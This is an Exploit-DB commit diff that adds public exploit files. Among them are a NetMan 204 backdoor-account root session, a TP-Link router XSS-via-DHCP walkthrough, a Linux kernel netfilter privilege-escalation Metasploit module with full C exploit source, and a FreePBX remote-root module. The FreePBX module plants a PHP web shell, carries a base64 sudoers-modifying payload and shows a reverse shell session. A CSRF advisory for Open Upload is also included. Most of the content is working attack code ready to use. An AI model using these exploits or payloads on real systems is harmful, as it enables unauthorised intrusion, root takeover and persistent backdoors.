Zabbix 2.2 < 3.0.3 - API JSON-RPC Remote Code Execution

Open Upload 0.4.2 - Multiple Cross-Site Request Forgery Vulnerabilities

NUUO NVRmini2 / NVRsolo / Crystal Devices and NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities
NUUO NVRmini2 / NVRsolo / Crystal Devices / Netgear ReadyNAS Surveillance Application - Multiple Vulnerabilities

FreePBX 13 / 14 - Remote Command Execution With Privilege Escalation
FreePBX 13 / 14 - Remote Command Execution / Privilege Escalation

Easy FTP Server 1.7.0.11 - 'APPE' Command Buffer Overflow Remote Exploit
EasyFTP Server 1.7.0.11 - 'APPE' Command Buffer Overflow Remote Exploit

Android 5.0 <= 5.1.1 -  Stagefright .MP4 tx3g Integer Overflow (Metasploit)
This commit is contained in:
Offensive Security 2016-09-28 11:55:43 +00:00
parent 35000196e1
commit f421077feb
10 changed files with 2307 additions and 229 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

456
files.csv
View file

File diff suppressed because it is too large Load diff

1212
platforms/android/remote/40436.rb Executable file
View file

File diff suppressed because it is too large Load diff

78
platforms/hardware/remote/40431.txt Executable file
View file

@ -0,0 +1,78 @@
NetMan 204 - Backdoor Account
Author: Saeed reza Zamanian [penetrationtest @ Linkedin]
Product: NetMan 204
Vendor: http://www.riello-ups.com
Product URL: http://www.riello-ups.com/products/4-software-connectivity/85-netman-204
Quick Reference Installation Manual : http://www.riello-ups.com/uploads/file/325/1325/0MNACCSA4ENQB__MAN_ACC_NETMAN_204_QST_EN_.pdf
Date: 23 Sep 2016
About Product:
----------------------
The NetMan 204 network agent allows UPS directly connected over LAN 10/100 Mb connections to be managed using the main network communication protocols (TCP /IP , HTTP HTTPS, SSH, SNMPv1, SNMPv2 and SNMPv3).
It is the ideal solution for the integration of UPS over Ethernet networks with Modbus/TCP and BACnet/IP protocols. It was developed to integrate UPS into medium-sized and large networks,
to provide a high level of reliability in communication between the UPS and associated management systems.
Vulnerability Report:
----------------------
The UPS Module has 3 default accounts, (admin,fwupgrade,user) , fwupgrade has a shell access to the device BUT if you try to get access to the shell a shell script closes your conection.
to stop the shell script and avoid to terminate your connection you should , set your SSH client to execute "/bin/bash" after you logon the SSH. as a result your shell type will be changed to "/bin/bash"
as you see below there is an account called "eurek" and ofcourse it's password also is "eurek".
Since that "eurek" is a sudoer user you will get full access to the device.
Enjoy It!
login as: eurek
eurek@172.19.16.33's password:
Could not chdir to home directory /home/eurek: No such file or directory
eurek@UPS:/$ id
uid=1000(eurek) gid=1000(eurek) groups=1000(eurek),27(sudo)
eurek@UPS:/$ sudo bash
[sudo] password for eurek:
root@UPS:/# id
uid=0(root) gid=0(root) groups=0(root)
root@UPS:/#
login as: fwupgrade
fwupgrade@172.19.16.33's password:
fwupgrade@UPS:/home/fwupgrade$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
messagebus:x:102:104::/var/run/dbus:/bin/false
eurek:x:1000:1000:eurek,,,:/home/eurek:/bin/bash
postfix:x:103:106::/var/spool/postfix:/bin/false
statd:x:104:65534::/var/lib/nfs:/bin/false
pulse:x:105:110:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:106:112:RealtimeKit,,,:/proc:/bin/false
admin:x:1001:1001:,,,:/home/./admin:/bin/bash
fwupgrade:x:1002:1002:,,,:/home/./fwupgrade:/bin/bash
user:x:1003:1003:,,,:/home/user:/bin/bash
ftp:x:107:113:ftp daemon,,,:/srv/ftp:/bin/false
fwupgrade@UPS:/home/fwupgrade$
# EOF

44
platforms/hardware/webapps/40432.txt Executable file
View file

@ -0,0 +1,44 @@
# Exploit Title: TP-Link Archer CR-700 XSS vulnerability
# Google Dork: N/A
# Date: 09/07/2016
# Exploit Author: Ayushman Dutta
# Vendor Homepage: http://www.tp-link.us/
# Software Link: N/A
# Version: 1.0.6 (REQUIRED)
# Tested on: Linux
# CVE : N/A
#Exploit Information:
https://github.com/ayushman4/TP-Link-Archer-CR-700-XSS-Exploit/blob/master/README.md
TP-Link-Archer-CR-700-XSS-Exploit
Exploiting TP-Link Archer CR-700 Router. (Responsibly Disclosed to TP-Link)
Step 1-> On you linux machine (Kali or Ubuntu) type the following command
gedit /etc/dhcp/dhclient.conf
Comment out the line below
send host-name = gethostname();
Copy it to the line below it and change the gethostname() function to an XSS script like below.
send host-name = "<script>alert(5)</script>";
Step 2:Restart your linux system so that the changes takes into effect.
Step 3: Send a DHCP request to the router to receive an IP address with the command below.(Try this on any open network routers which is using TP-Link Archer CR-700)
dhclient -v -i wlan0
On running the command above, it send a DHCP request to the router. On a DHCP request, the host name is sent to which we have forcibly set it to an XSS script <script>alert(5)</script>
Step 4: Login to the administrator console.
On logging in the Script executes.
One more issue that I saw in the router that was that there was no CSRF token. The cookie set by the router contains a base64 encoded username & password whcih can be stolen using an XSS script.
Note:All The above information has been disclosed to TP-Link, who have reporduced the problem and passed it to their R&D team to fix the issue.
A URL to the product https://www.amazon.com/Wireless-Certified-Cablevision-Archer-CR700/dp/B012I96J3W

431
platforms/lin_x86/local/40435.rb Executable file
View file

@ -0,0 +1,431 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require "msf/core"
class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Linux Kernel 4.6.3 Netfilter Privilege Escalation',
'Description' => %q{
This module attempts to exploit a netfilter bug on Linux Kernels befoe 4.6.3, and currently
only works against Ubuntu 16.04 (not 16.04.1) with kernel
4.4.0-21-generic.
Several conditions have to be met for successful exploitation:
Ubuntu:
1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such)
2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile
Kernel 4.4.0-31-generic and newer are not vulnerable.
We write the ascii files and compile on target instead of locally since metasm bombs for not
having cdefs.h (even if locally installed)
},
'License' => MSF_LICENSE,
'Author' =>
[
'h00die <mike@stcyrsecurity.com>', # Module
'vnik' # Discovery
],
'DisclosureDate' => 'Jun 03 2016',
'Platform' => [ 'linux'],
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' =>
[
[ 'Ubuntu', { } ]
#[ 'Fedora', { } ]
],
'DefaultTarget' => 0,
'References' =>
[
[ 'EDB', '40049'],
[ 'CVE', '2016-4997'],
[ 'URL', 'http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c']
]
))
register_options(
[
OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),
OptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 180 ]),
OptBool.new('REEXPLOIT', [ true, 'desc already ran, no need to re-run, skip to running pwn',false]),
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])
], self.class)
end
def check
def iptables_loaded?()
# user@ubuntu:~$ cat /proc/modules | grep ip_tables
# ip_tables 28672 1 iptable_filter, Live 0x0000000000000000
# x_tables 36864 2 iptable_filter,ip_tables, Live 0x0000000000000000
vprint_status('Checking if ip_tables is loaded in kernel')
if target.name == "Ubuntu"
iptables = cmd_exec('cat /proc/modules | grep ip_tables')
if iptables.include?('ip_tables')
vprint_good('ip_tables.ko is loaded')
else
print_error('ip_tables.ko is not loaded. root needs to run iptables -L or similar command')
end
return iptables.include?('ip_tables')
elsif target.name == "Fedora"
iptables = cmd_exec('cat /proc/modules | grep iptable_raw')
if iptables.include?('iptable_raw')
vprint_good('iptable_raw is loaded')
else
print_error('iptable_raw is not loaded. root needs to run iptables -L or similar command')
end
return iptables.include?('iptable_raw')
else
return false
end
end
def shemsham_installed?()
# we want this to be false.
vprint_status('Checking if shem or sham are installed')
shemsham = cmd_exec('cat /proc/cpuinfo')
if shemsham.include?('shem')
print_error('shem installed, system not vulnerable.')
elsif shemsham.include?('sham')
print_error('sham installed, system not vulnerable.')
else
vprint_good('shem and sham not present.')
end
return (shemsham.include?('shem') or shemsham.include?('sham'))
end
if iptables_loaded?() and not shemsham_installed?()
return CheckCode::Appears
else
return CheckCode::Safe
end
end
def exploit
# first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version.
def has_prereqs?()
vprint_status('Checking if 32bit C libraries, gcc-multilib, and gcc are installed')
if target.name == "Ubuntu"
lib = cmd_exec('dpkg --get-selections | grep libc6-dev-i386')
if lib.include?('install')
vprint_good('libc6-dev-i386 is installed')
else
print_error('libc6-dev-i386 is not installed. Compiling will fail.')
end
multilib = cmd_exec('dpkg --get-selections | grep ^gcc-multilib')
if multilib.include?('install')
vprint_good('gcc-multilib is installed')
else
print_error('gcc-multilib is not installed. Compiling will fail.')
end
gcc = cmd_exec('which gcc')
if gcc.include?('gcc')
vprint_good('gcc is installed')
else
print_error('gcc is not installed. Compiling will fail.')
end
return gcc.include?('gcc') && lib.include?('install') && multilib.include?('install')
elsif target.name == "Fedora"
lib = cmd_exec('dnf list installed | grep -E \'(glibc-devel.i686|libgcc.i686)\'')
if lib.include?('glibc')
vprint_good('glibc-devel.i686 is installed')
else
print_error('glibc-devel.i686 is not installed. Compiling will fail.')
end
if lib.include?('libgcc')
vprint_good('libgcc.i686 is installed')
else
print_error('libgcc.i686 is not installed. Compiling will fail.')
end
multilib = false #not implemented
gcc = false #not implemented
return (lib.include?('glibc') && lib.include?('libgcc')) && gcc && multilib
else
return false
end
end
compile = false
if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'
if has_prereqs?()
compile = true
vprint_status('Live compiling exploit on system')
else
vprint_status('Dropping pre-compiled exploit on system')
end
end
if check != CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
end
desc_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
env_ready_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
pwn_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
payload_file = rand_text_alpha(8)
payload_path = "#{datastore["WritableDir"]}/#{payload_file}"
# direct copy of code from exploit-db, except removed the check for shem/sham and ip_tables.ko since we can do that in the check area here
# removed #include <netinet/in.h> per busterb comment in PR 7326
decr = %q{
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sched.h>
#include <netinet/in.h>
#include <linux/sched.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ptrace.h>
#include <net/if.h>
#include <linux/netfilter_ipv4/ip_tables.h>
#include <linux/netlink.h>
#include <fcntl.h>
#include <sys/mman.h>
#define MALLOC_SIZE 66*1024
int decr(void *p) {
int sock, optlen;
int ret;
void *data;
struct ipt_replace *repl;
struct ipt_entry *entry;
struct xt_entry_match *ematch;
struct xt_standard_target *target;
unsigned i;
sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);
if (sock == -1) {
perror("socket");
return -1;
}
data = malloc(MALLOC_SIZE);
if (data == NULL) {
perror("malloc");
return -1;
}
memset(data, 0, MALLOC_SIZE);
repl = (struct ipt_replace *) data;
repl->num_entries = 1;
repl->num_counters = 1;
repl->size = sizeof(*repl) + sizeof(*target) + 0xffff;
repl->valid_hooks = 0;
entry = (struct ipt_entry *) (data + sizeof(struct ipt_replace));
entry->target_offset = 74; // overwrite target_offset
entry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target);
ematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry));
strcpy(ematch->u.user.name, "icmp");
void *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0);
uint64_t *me = (uint64_t *)(kmatch + 0x58);
*me = 0xffffffff821de10d; // magic number!
uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4);
*match = (uint32_t)kmatch;
ematch->u.match_size = (short)0xffff;
target = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8);
uint32_t *t = (uint32_t *)target;
*t = (uint32_t)kmatch;
printf("[!] Decrementing the refcount. This may take a while...\n");
printf("[!] Wait for the \"Done\" message (even if you'll get the prompt back).\n");
for (i = 0; i < 0xffffff/2+1; i++) {
ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024);
}
close(sock);
free(data);
printf("[+] Done! Now run ./pwn\n");
return 0;
}
int main(void) {
void *stack;
int ret;
printf("netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\n");
ret = unshare(CLONE_NEWUSER);
if (ret == -1) {
perror("unshare");
return -1;
}
stack = (void *) malloc(65536);
if (stack == NULL) {
perror("malloc");
return -1;
}
clone(decr, stack + 65536, CLONE_NEWNET, NULL);
sleep(1);
return 0;
}
}
# direct copy of code from exploit-db
pwn = %q{
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <stdint.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <assert.h>
#define MMAP_ADDR 0xff814e3000
#define MMAP_OFFSET 0xb0
typedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred);
typedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t cred);
void __attribute__((regparm(3))) privesc() {
commit_creds_fn commit_creds = (void *)0xffffffff810a21c0;
prepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0;
commit_creds(prepare_kernel_cred((uint64_t)NULL));
}
int main() {
void *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0);
assert(payload == (void *)MMAP_ADDR);
void *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET);
memset(shellcode, 0, 0x300000);
void *ret = memcpy(shellcode, &privesc, 0x300);
assert(ret == shellcode);
printf("[+] Escalating privs...\n");
int fd = open("/dev/ptmx", O_RDWR);
close(fd);
assert(!getuid());
printf("[+] We've got root!");
return execl("/bin/bash", "-sh", NULL);
}
}
# the original code printed a line. However, this is hard to detect due to threading.
# so instead we can write a file in /tmp to catch.
decr.gsub!(/printf\("\[\+\] Done\! Now run \.\/pwn\\n"\);/,
"int fd2 = open(\"#{env_ready_file}\", O_RDWR|O_CREAT, 0777);close(fd2);" )
# patch in to run our payload
pwn.gsub!(/execl\("\/bin\/bash", "-sh", NULL\);/,
"execl(\"#{payload_path}\", NULL);")
def pwn(payload_path, pwn_file, pwn, compile)
# lets write our payload since everythings set for priv esc
vprint_status("Writing payload to #{payload_path}")
write_file(payload_path, generate_payload_exe)
cmd_exec("chmod 555 #{payload_path}")
register_file_for_cleanup(payload_path)
# now lets drop part 2, and finish up.
rm_f pwn_file
if compile
print_status "Writing pwn executable to #{pwn_file}.c"
rm_f "#{pwn_file}.c"
write_file("#{pwn_file}.c", pwn)
cmd_exec("gcc #{pwn_file}.c -O2 -o #{pwn_file}")
register_file_for_cleanup("#{pwn_file}.c")
else
print_status "Writing pwn executable to #{pwn_file}"
write_file(pwn_file, pwn)
end
register_file_for_cleanup(pwn_file)
cmd_exec("chmod +x #{pwn_file}; #{pwn_file}")
end
if not compile # we need to override with our pre-created binary
# pwn file
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-pwn.out')
fd = ::File.open( path, "rb")
pwn = fd.read(fd.stat.size)
fd.close
# desc file
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-decr.out')
fd = ::File.open( path, "rb")
decr = fd.read(fd.stat.size)
fd.close
# overwrite the hardcoded variable names in the compiled versions
env_ready_file = '/tmp/okDjTFSS'
payload_path = '/tmp/2016_4997_payload'
end
# check for shortcut
if datastore['REEXPLOIT']
pwn(payload_path, pwn_file, pwn, compile)
else
rm_f desc_file
if compile
print_status "Writing desc executable to #{desc_file}.c"
rm_f "#{desc_file}.c"
write_file("#{desc_file}.c", decr)
register_file_for_cleanup("#{desc_file}.c")
output = cmd_exec("gcc #{desc_file}.c -m32 -O2 -o #{desc_file}")
else
write_file(desc_file, decr)
end
rm_f env_ready_file
register_file_for_cleanup(env_ready_file)
#register_file_for_cleanup(desc_file)
if not file_exist?(desc_file)
vprint_error("gcc failure output: #{output}")
fail_with(Failure::Unknown, "#{desc_file}.c failed to compile")
end
if target.name == "Ubuntu"
vprint_status "Executing #{desc_file}, may take around 35s to finish. Watching for #{env_ready_file} to be created."
elsif target.name == "Fedora"
vprint_status "Executing #{desc_file}, may take around 80s to finish. Watching for #{env_ready_file} to be created."
end
cmd_exec("chmod +x #{desc_file}; #{desc_file}")
sec_waited = 0
until sec_waited > datastore['MAXWAIT'] do
Rex.sleep(1)
if sec_waited % 10 == 0
vprint_status("Waited #{sec_waited}s so far")
end
if file_exist?(env_ready_file)
print_good("desc finished, env ready.")
pwn(payload_path, pwn_file, pwn, compile)
return
end
sec_waited +=1
end
end
end
end

2
platforms/linux/local/21980.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/6094/info
Vulnerabilities have been discovered in two files used by Abuse.
@ -7,6 +8,7 @@ By passing an execessively long commandline argument to Abuse, it is possible to
It should be noted that one of the affected files is installed setuid root.
It should also be noted that Abuse 2.00, packaged and distributed with the x86 architecture of Debian Linux 3.0 has been reported vulnerable. It is not yet known if other packages are affected by this issue.
*/
/* Abuse.console version 2.0 Exploit */
/* By Girish<girish@mec.ac.in>

6
platforms/linux/local/40203.py
View file

@ -4,13 +4,11 @@
# Program affected: zFTP Client
# Affected value: NAME under FTP connection
# Where in the code: Line 30 in strcpy_chk.c
# __strcpy_chk (dest=0xb7f811c0 <cdf_value> "/KUIP", src=0xb76a6680
"/MACRO", destlen=0x50) at strcpy_chk.c:30
# __strcpy_chk (dest=0xb7f811c0 <cdf_value> "/KUIP", src=0xb76a6680 "/MACRO", destlen=0x50) at strcpy_chk.c:30
# Version: 20061220+dfsg3-4.1
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
# Program description: ZFTP is a macro-extensible file transfer
program which supports the
# Program description: ZFTP is a macro-extensible file transfer program which supports the
# transfer of formatted, unformatted and ZEBRA RZ files
# Kali Linux 2.0 package: pool/main/c/cernlib/zftp_20061220+dfsg3-4.1_i386.deb
# MD5sum: 524217187d28e4444d6c437ddd37e4de

2
platforms/multiple/dos/38779.py
View file

@ -1,3 +1,4 @@
'''
source: http://www.securityfocus.com/bid/62723/info
Abuse HTTP Server is prone to a remote denial-of-service vulnerability.
@ -5,6 +6,7 @@ Abuse HTTP Server is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to cause denial-of-service conditions.
Abuse HTTP Server version 2.08 is vulnerable; other versions may also be affected.
'''
#!/usr/bin/python

240
platforms/php/remote/40434.rb Executable file
View file

@ -0,0 +1,240 @@
#Title : Freepbx < 13.0.188 , Remote root exploit
#Vulnerable software : Freepbx < 13.0.188
#Author : Ahmed Sultan (0x4148)
#Email : 0x4148@gmail.com
#Current software status : patch released
#Vendor : Sangoma <freepbx.org>
=begin
Freepbx 13.x are vulnerable to Remote command execution due to the insuffecient sanitization of the user input fields language,destination and also due to the lack of good authentication checking
Technical details
Vulnerable file : admin/modules/hotelwakeup/Hotelwakeup.class.php
Line 102 :
public function generateCallFile($foo) {
...............................
if (empty($foo['filename'])) {
$foo['filename'] = "wuc.".$foo['time'].".ext.".$foo['ext'].".call"; <<<<<---------------------Vulnerable
}
...........................
// Delete any old .call file with the same name as the one we are creating.
if(file_exists($outfile) ) {
unlink($outfile);
}
// Create up a .call file, write and close
$wuc = fopen($tempfile, 'w');
fputs( $wuc, "channel: Local/".$foo['ext']."@originate-skipvm\n" );
fputs( $wuc, "maxretries: ".$foo['maxretries']."\n");
fputs( $wuc, "retrytime: ".$foo['retrytime']."\n");
fputs( $wuc, "waittime: ".$foo['waittime']."\n");
fputs( $wuc, "callerid: ".$foo['callerid']."\n");
fputs( $wuc, 'set: CHANNEL(language)='.$foo['language']."\n"); <<<<<---------------------Vulnerable
fputs( $wuc, "application: ".$foo['application']."\n");
fputs( $wuc, "data: ".$foo['data']."\n");
fclose( $wuc );
..........................
The ext value can be manipulated by the attacker to change the output file path
the language value can be manipulated by the attacket to load in malicious contents
Function is called at
Line 94 :
public function addWakeup($destination, $time, $lang) {
$date = $this->getConfig(); // module config provided by user
$this->generateCallFile(array(
"time" => $time,
"date" => 'unused',
"ext" => $destination, <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<================ Vulnerable [Filename field]
"language" => $lang, <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<================ Vulnerable [language field loaded with malicious code]
"maxretries" => $date['maxretries'],
"retrytime" => $date['retrytime'],
"waittime" => $date['waittime'],
"callerid" => $date['cnam']." <".$date['cid'].">",
"application" => 'AGI',
"data" => 'wakeconfirm.php',
));
}
addWakeup function is called when calling the hotelwakeup module via ajax.php and setting savecall as command
Line 60 :
switch($_REQUEST['command']) {
case "savecall":
if(empty($_POST['language'])) {
$lang = 'en'; //default to English if empty
} else {
$lang = $_POST['language']; <<<<<<<<<<<<<<<<<<<===========================
}
............................................
if ($badtime) {
// abandon .call file creation and pop up a js alert to the user
return array("status" => false, "message" => sprintf(_("Cannot schedule the call the scheduled time is in the past. [Time now: %s] [Wakeup Time: %s]"),date(DATE_RFC2822,$time_now),date(DATE_RFC2822,$time_wakeup)));
} else {
$this->addWakeup($_POST['destination'],$time_wakeup,$lang); <<<<<<<<<<<=======================
return array("status" => true);
}
.................................
POC :
[0x4148:/lab]# curl "http://68.170.92.50:8080/admin/ajax.php" -H "Host: 68.170.92.50:8080" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" -H "Accept-Language: en-US,en;q=0.5" --compressed -H "Referer: http://68.170.92.50:8080/admin/ajax.php" -H "Cookie: lang=en_US; PHPSESSID=9sfgl5leajk74buajm0re2i014" -H "Connection: keep-alive" -H "Upgrade-Insecure-Requests: 1" --data "module=hotelwakeup&command=savecall&day=now&time="%"2B1 week&destination=/../../../../../../var/www/html/0x4148.php&language=<?php system('uname -a;id');?>"
{"error":{"type":"Whoops\\Exception\\ErrorException","message":"touch(): Unable to create file \/var\/spool\/asterisk\/tmp\/wuc.1475613328.ext.\/..\/..\/..\/..\/..\/..\/var\/www\/html\/0x4148.php.call because No such file or directory","file":"\/var\/www\/html\/admin\/modules\/hotelwakeup\/Hotelwakeup.class.php","line":238}}#
The error mean nothing , we still can get our malicious file via http://server:port/0x4148.php.call
the server will ignore.call extn and will execute the php
[0x4148:/lab]# curl "http://68.170.92.50:8080/0x4148.php.call"
channel: Local//../../../../../../var/www/html/0x4148.php@originate-skipvm
maxretries: 3
retrytime: 60
waittime: 60
callerid: Wake Up Calls <*68>
set: CHANNEL(language)=Linux HOUPBX 2.6.32-504.8.1.el6.x86_64 #1 SMP Wed Jan 28 21:11:36 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
uid=499(asterisk) gid=498(asterisk) groups=498(asterisk)
application: AGI
data: wakeconfirm.php
Privelage can be escalated via adding the asterisk user to sudoers which can be done manually
then echo a > /var/spool/asterisk/sysadmin/amportal_restart
sleeping for few seconds
then sudo bash -i
MSF OUTPUT
msf > use exploit/fpbx
msf exploit(fpbx) > set RHOST 68.170.92.50
RHOST => 68.170.92.50
msf exploit(fpbx) > set RPORT 8080
RPORT => 8080
msf exploit(fpbx) > exploit
[*] [2016.09.27-16:39:21] Started reverse TCP handler on 88.150.231.125:443
[*] [2016.09.27-16:39:21] 68.170.92.50:8080 - Sending payload . . .
[*] [2016.09.27-16:39:21] 68.170.92.50:8080 - Trying to execute payload
[+] [2016.09.27-16:39:41] 68.170.92.50:8080 - Payload executed
[*] [2016.09.27-16:39:41] 68.170.92.50:8080 - Spawning root shell <taking around 20 seconds in case of success>
id
uid=0(root) gid=0(root) groups=0(root)
sh -i
sh: no job control in this shell
sh-4.1# pwd
pwd
/var/www/html
sh-4.1# whoami
whoami
root
sh-4.1#
=end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'FreePBX < 13.0.188.1 Remote root exploit',
'Description' => '
This module exploits an unauthenticated remote command execution in FreePBX module Hotelwakeup
',
'License' => MSF_LICENSE,
'Author' =>
[
'Ahmed sultan (0x4148) <0x4148@gmail.com>', # discovery of vulnerability and msf module
],
'References' =>
[
"NA"
],
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'perl telnet python'
}
},
'Platform' => %w(linux unix),
'Arch' => ARCH_CMD,
'Targets' => [['Automatic', {}]],
'Privileged' => 'false',
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 27 2016'))
end
def print_status(msg = '')
super("#{rhost}:#{rport} - #{msg}")
end
def print_error(msg = '')
super("#{rhost}:#{rport} - #{msg}")
end
def print_good(msg = '')
super("#{rhost}:#{rport} - #{msg}")
end
# Application Check
def check
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'ajax.php'),
'headers' => {
'Referer' => "http://#{datastore['RHOST']}/jnk0x4148stuff"
},
'vars_post' => {
'module' => 'hotelwakeup',
'command' => 'savecall'
}
)
unless res
vprint_error('Connection timed out.')
end
if res.body.include? "Referrer"
vprint_good("Hotelwakeup module detected")
return Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
def exploit
vprint_status('Sending payload . . .')
pwn = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'ajax.php'),
'headers' => {
'Referer' => "http://#{datastore['RHOST']}:#{datastore['RPORT']}/admin/ajax.php?module=hotelwakeup&action=savecall",
'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
'User-agent' => "mostahter ;)"
},
'vars_post' => {
'module' => 'hotelwakeup',
'command' => 'savecall',
'day' => 'now',
'time' => '+1 week',
'destination' => '/../../../../../../var/www/html/0x4148.php',
'language' => '<?php echo "0x4148@r1z";if($_GET[\'r1zcmd\']!=\'\'){system("sudo ".$_GET[\'r1zcmd\']);}else{fwrite(fopen("0x4148.py","w+"),base64_decode("IyEvdXNyL2Jpbi9lbnYgcHl0aG9uCmltcG9ydCBvcwppbXBvcnQgdGltZQojIC0qLSBjb2Rpbmc6IHV0Zi04IC0qLSAKY21kID0gJ3NlZCAtaSBcJ3MvQ29tIEluYy4vQ29tIEluYy5cXG5lY2hvICJhc3RlcmlzayBBTEw9XChBTExcKVwgICcgXAoJJ05PUEFTU1dEXDpBTEwiXD5cPlwvZXRjXC9zdWRvZXJzL2dcJyAvdmFyL2xpYi8nIFwKCSdhc3Rlcmlzay9iaW4vZnJlZXBieF9lbmdpbmUnCm9zLnN5c3RlbShjbWQpCm9zLnN5c3RlbSgnZWNobyBhID4gL3Zhci9zcG9vbC9hc3Rlcmlzay9zeXNhZG1pbi9hbXBvcnRhbF9yZXN0YXJ0JykKdGltZS5zbGVlcCgyMCk="));system("python 0x4148.py");}?>',
}
)
#vprint_status("#{pwn}")
vprint_status('Trying to execute payload <taking around 20 seconds in case of success>')
escalate = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '0x4148.php.call'),
'vars_get' => {
'0x4148' => "r1z"
}
)
if escalate.body.include? "0x4148@r1z"
vprint_good("Payload executed")
vprint_status("Spawning root shell")
killit = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '0x4148.php.call'),
'vars_get' => {
'r1zcmd' => "#{payload.encoded}"
}
)
else
vprint_error("Exploitation Failed")
end
end
end

65
platforms/php/webapps/40168.txt Executable file
View file

@ -0,0 +1,65 @@
================================================================================================================
Open Upload 0.4.2 Remote Admin Add CSRF Exploit and Changing Normal user permission
================================================================================================================
# Exploit Title : Open Upload 0.4.2 Remote Admin Add CSRF Exploit
# Exploit Author : Vinesh Redkar (@b0rn2pwn)
# Email : vineshredkar89[at]gmail[d0t]com
# Date: 21/07/2016
# Vendor Homepage: http://openupload.sourceforge.net/
# Software Link: https://sourceforge.net/projects/openupload/
# Version: 0.4.2
# Tested on: Windows 10 OS
Open Upload Application is vulnerable to CSRF attack (No CSRF token in place) meaning
that if an admin user can be tricked to visit a crafted URL created by
attacker (via spear phishing/social engineering).
